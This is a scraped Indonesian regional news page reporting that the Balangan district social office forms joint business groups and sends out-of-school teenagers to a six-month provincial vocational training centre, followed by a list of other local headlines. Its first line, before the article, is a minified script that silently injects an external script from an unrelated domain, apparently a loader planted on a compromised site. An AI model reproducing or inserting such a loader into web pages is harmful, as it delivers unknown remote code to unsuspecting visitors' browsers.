(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Dinsos Balangan Berdayakan Anak Remaja Putus Sekolah


KANALKALIMANTAN.COM, PARINGIN – Upaya pemberdayaan masyarakat demi meningkatkan sekaligus menyejahterakan warga di Kabupaten Balangan, Dinas Sosial Balangan programkan pembentukan kelompok usaha bersama dan pemberdayaan untuk anak remaja putus sekolah.

Kepala Dinas Sosial Kabupaten Balangan, Ribowo mengatakan, pihaknya membantu masyarakat dalam peningkatan perekonomian dengan cara membentuk suatu kelompok usaha bersama dinaungi Dinas Sosial.

“Kami membantu masyarakat yang memiliki produk dengan memenuhi keperluan mereka dalam menjalankan usahanya, tentu saja mereka harus mengajukan proposal terlebih dahulu kepada Dinas Sosial,” ujar Ribowo, Senin (19/4/2021)

Selain itu, pihaknya memberikan pembinaan kepada kelompok usaha bersama dengan memberikan edukasi dan sosialisasi bagaimana cara menjalankan usaha tersebut.

 

 

Program untuk anak remaja yang putus sekolah, menjadi salah satu program dari Dinas Sosial dengan cara mengikutkan pelatihan ke Panti Sosial Bina Remaja (PSBR) milik Pemerintah Provinsi Kalsel.

Anak-anak yang terlantar dalam artian putus sekolah dan tidak bekerja harus dilakukan pembinaan agar tidak terjerumus dalam hal-hal negatif, salah satunya dengan diikutkan dalam pelatihan di PSBR.

“Di sana mereka akan dilatih selama 6 bulan, dan setelah pulang mereka akan mendapatkan permodalan berupa alat dari jurusan yang mereka ambil, seperti jurusan menjahit akan mendapatkan mesin jahit,” jelasnya.

Ia berharap, adanya program ini akan membantu masyarakat dari segi perekonomian dan mengurangi angka pengangguran di Kabupaten Balangan. (kanalkalimantan.com/alfi)

Reporter : alfi
Editor : kk

 

 

 


Al Ghifari

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

1 jam ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

4 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

4 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

4 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

4 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

4 jam ago

This website uses cookies.